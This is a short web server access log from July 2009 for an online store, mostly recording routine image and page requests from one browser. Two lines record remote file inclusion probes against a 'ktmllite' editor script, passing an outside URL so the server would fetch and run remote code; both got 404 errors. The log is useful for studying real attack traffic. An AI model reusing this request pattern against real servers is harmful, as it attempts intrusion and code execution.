75.140.75.14 - - [16/Jul/2009:01:21:41 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C734E37F4A5008791000+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:21:44 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C734E37F4A5008791000+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:21:47 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C734E37F4A5008791000+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:21:47 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C734E37F4A5008791000+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:21:47 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C734E37F4A5008791000+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:21:51 -0400] "GET /images/head_aceLogo.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:21:52 -0400] "POST /CGI-BIN/LANSAWEB?WEBEVENT+L118C74483224E5000991000+M37+ENG HTTP/1.1" 200 37935 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C734E37F4A5008791000+M37+ENG" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:22:02 -0400] "GET /images/head_btn-shop.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
75.140.75.14 - - [16/Jul/2009:01:22:02 -0400] "GET /images/head_btn-products.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
87.106.245.84 - - [16/Jul/2009:01:22:02 -0400] "GET //ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
75.140.75.14 - - [16/Jul/2009:01:22:03 -0400] "GET /images/head_btn-catalogs.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/cgi-bin/lansaweb?procfun+wordpr01+webfunc+m37+funcparms+WEBKEY(A0100):PROMOS" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0; SV1; GTB6; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30618)"
87.106.245.84 - - [16/Jul/2009:01:22:03 -0400] "GET /logs//ktmllite/includes/ktedit/toolbar.php?dirDepth=http://www.angelcitytrading.com/css/1.zot? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
